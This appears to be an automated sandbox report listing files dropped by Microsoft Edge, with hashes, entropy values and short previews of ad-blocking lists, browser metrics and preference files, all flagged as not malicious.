                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\a7d92808-b8a7-4bbe-aa2e-66eb0b57ecad.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6760503D-788.pma

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                Entropy (8bit):0.047640353993796986
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:2ub0m5tmfnOAUJYVJy7qiRDs0JVFg8XY6I/hEHsBzhEhNGMv+RQ8TfWGYR0n8y0d:Tb0UtQXa6Pnhcxmv7m008T2RGOD
                                                                                                                                                                                                                                                MD5:32C98C77A74F7E6796A78E7D915AFB78
                                                                                                                                                                                                                                                SHA1:5FF167D47E37762DA04AFF796ADA60D896F65728
                                                                                                                                                                                                                                                SHA-256:54B574FA84D7E9037158EBBB65E04631388D8F48A945034D58C2045CE1E3D728
                                                                                                                                                                                                                                                SHA-512:07746DE1CB6C95855B712B9EF088EFC8C50C5370D4A2486BB9F9A5E753F1F6470E0466AE72BC5FBCC21B48F79AAF1C2D86D183BAA191F771A2914D4A5B00C71E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@................k...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".spipsf20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U..G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........9...... .2..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6760503E-F70.pma

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                Entropy (8bit):0.4995815634055697
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:QTLbnORjN0WVZiIYdFIPkcopAQJx5DSUFSEsJSgzqxxDKtSg1HFwI2D:wbn2lYdFqkcozPBFSPSgzq3KtSaHC
                                                                                                                                                                                                                                                MD5:5A30094B06F1C73D179E0E4FF0C630F2
                                                                                                                                                                                                                                                SHA1:41F85A26D81284E7334E89754508D879574716DF
                                                                                                                                                                                                                                                SHA-256:79F468A8739BDE92BEC3A2E71ED24E5F1E74710FCC8648BA00CF09EA3FC197CD
                                                                                                                                                                                                                                                SHA-512:8B7C5ED430034231A1B42710ECEF0A377C49E0B35F040D28AC56CE6E41F14F4154F539B8E3AD26B95367C3951C00C504B86F1C807C5A2439584AD24364FB2C98
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".spipsf20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U?:K...G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                Entropy (8bit):4.16517681506792
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
                                                                                                                                                                                                                                                MD5:C847567DEE0317368C1EC824DE025887
                                                                                                                                                                                                                                                SHA1:554098F22FEA9282FE1AAB35560849CD6FF546B1
                                                                                                                                                                                                                                                SHA-256:3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
                                                                                                                                                                                                                                                SHA-512:A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1636825c-b5cd-43bc-bd92-ae03ca141837.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17600), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17602
                                                                                                                                                                                                                                                Entropy (8bit):5.487164445260977
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdJ99QTryDiuabatSuypbsH7RyaNPy9QZk1NP3dAqn1kKluQ1lz1G5Qne8VpbVZ:stdPGQSu4bsHltJyVLp1PZbGLQw7Ar
                                                                                                                                                                                                                                                MD5:6345B319AFB9B841862C6AE864349DED
                                                                                                                                                                                                                                                SHA1:FC90298F64B811253269C087B9399D227C950D37
                                                                                                                                                                                                                                                SHA-256:0351E179B8F5062C33C2CB9D2B9FC92A0E8F2F8FE7AC58BAAD9802F33C6285F7
                                                                                                                                                                                                                                                SHA-512:1DCB8B89A74506E44AEB4E395C4D5F9BB51672CDA4611D8C80E7E7638CE1628E6409A65A9E0ADFD2108BA645F29E9B17EC92D1936F427C590E55F4A0DF4C04DC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378838847322929","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3664d98e-bf3b-43be-9743-76a0ac302fef.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17435), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17437
                                                                                                                                                                                                                                                Entropy (8bit):5.4904182826609995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdJ99QTryDiuabatSuypbsH7RyaNPy9QZk1NP3dAqn1kKluQ1lz1G5Qne8VpbV8:stdPGQSu4bsHltJyVLp1PZbGLQw1r
                                                                                                                                                                                                                                                MD5:E32DC80E14FF0A6121554BDEC4100EB3
                                                                                                                                                                                                                                                SHA1:CA9712AD2169D2950ED8D410AE10DB81927E0513
                                                                                                                                                                                                                                                SHA-256:F9C4A0DE39310356577702696A17C5B6ADCD082F11121E39DBA0877F3127FC93
                                                                                                                                                                                                                                                SHA-512:79EFAC76A491E1EA573E41637EB1B8A6A181D6AD04FF83B9A9B7ADA08AC03138D4A9A9EA5611F607ACFFDC4774BBC5A3D96C27F11631911016FDA71E7D99AD33
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378838847322929","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\445c7a32-439f-4fc6-a083-309f33be822a.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17600), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17602
                                                                                                                                                                                                                                                Entropy (8bit):5.487021880150601
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdJ99QTryDiuabatSuypbsH7RyaNPy9QZk1NP3dAqn1kKluQ1lz1G5Qne8VpbVU:stdPGQSu4bsHltJyVLp1PZbGLQw8NAr
                                                                                                                                                                                                                                                MD5:7047AE34D74A927609E98F371480263C
                                                                                                                                                                                                                                                SHA1:B590B1155949856EF40B4027EBF6218CF3A62F53
                                                                                                                                                                                                                                                SHA-256:75B11B3102C60D5BE93F1A2DE73D7ACBB833E1838279B93A81EEB43098BD8489
                                                                                                                                                                                                                                                SHA-512:2E3493A75F754D35F5022236AB4D324BBFF36FBAA6CE2C9C5D58568D4166BC6D3918B4C30A49F2DC227EF45812F82F9519A5B080B8C8328C5259B9464B074FFC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378838847322929","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5256cd5e-bd8e-400d-9c3c-f4053607a7d0.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17250), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17252
                                                                                                                                                                                                                                                Entropy (8bit):5.491937444390585
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdJ99QTryDiuabatSuypbsH7RyaNPy9QZk1NP3dAqn1kKluQ1lz1Gje8VpbV+F/:stdPGQSu4bsHltJyVLp1P0bGLQwvr
                                                                                                                                                                                                                                                MD5:3583898D848210EF6C4842344855EDCC
                                                                                                                                                                                                                                                SHA1:0CC26651CA2F394C5CF0A82D4DB69BB61B3C4870
                                                                                                                                                                                                                                                SHA-256:53347CDFE0274538B96B2CDC21628DE374BB2795119CE9450744BED36022778D
                                                                                                                                                                                                                                                SHA-512:117959042156735757D23B54FD189BCBF38ED2A816B76ECE98A36D4CF2D7E4329CA2D7D4A832F5DCBA2DF1300C17231408D2024B4899FBB168D2079BDEAE22C3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378838847322929","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\6c5a9704-9ff3-4a12-b1ef-a5f029ee0751.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\72b896b8-5c07-44c5-ae7f-6239db6b5929.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40504
                                                                                                                                                                                                                                                Entropy (8bit):5.560995086483813
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:N6cFYi7pLGLhcaWP8efVr8F1+UoAYDCx9Tuqh0VfUC9xbog/OVMRBaWXzrwbQ/MK:N6cFY6chcaWP8efVru1jaFRBHXIbQkPy
                                                                                                                                                                                                                                                MD5:DDC5E9503E0FF913A2BBC0FAD9AAA778
                                                                                                                                                                                                                                                SHA1:6777BB441B06613009B48041BEB979EAF818290A
                                                                                                                                                                                                                                                SHA-256:B3BF3F1A856A929E22FC168CE981674A780E3DE2A537027EEB37F699354C02BE
                                                                                                                                                                                                                                                SHA-512:9EA0ED058483B7E9BB27F6C61880F821E9288E369E8403A04082237E3B0A05D143571C93F9C752EE5800E1DD8DBDA6D6E44A69042741969B328692A05D669CB5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378838846714906","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378838846714906","location":5,"ma

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\79872ae5-4bbb-4806-ba81-432692c582dd.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9610245c-e826-477b-a64f-4f31bd74af1c.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
